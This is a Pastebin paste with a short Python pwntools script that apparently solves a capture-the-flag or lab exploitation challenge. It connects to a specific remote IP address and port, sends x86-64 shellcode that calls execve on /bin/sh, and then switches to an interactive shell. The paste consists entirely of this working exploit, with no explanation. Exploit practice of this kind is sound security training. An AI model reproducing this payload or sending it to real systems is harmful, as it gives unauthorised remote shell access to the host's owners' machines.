Advertisement
Guest User

hahahaha

a guest
Jul 20th, 2019
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. from pwn import *
  4.  
  5.  
  6. payload = "\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05"
  7.  
  8.  
  9. shell = remote('141.85.224.102',31339)
  10.  
  11. d = shell.recv(100)
  12.  
  13. print d
  14.  
  15. shell.send(payload)
  16.  
  17. d = shell.recv(100)
  18. print d
  19.  
  20. shell.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement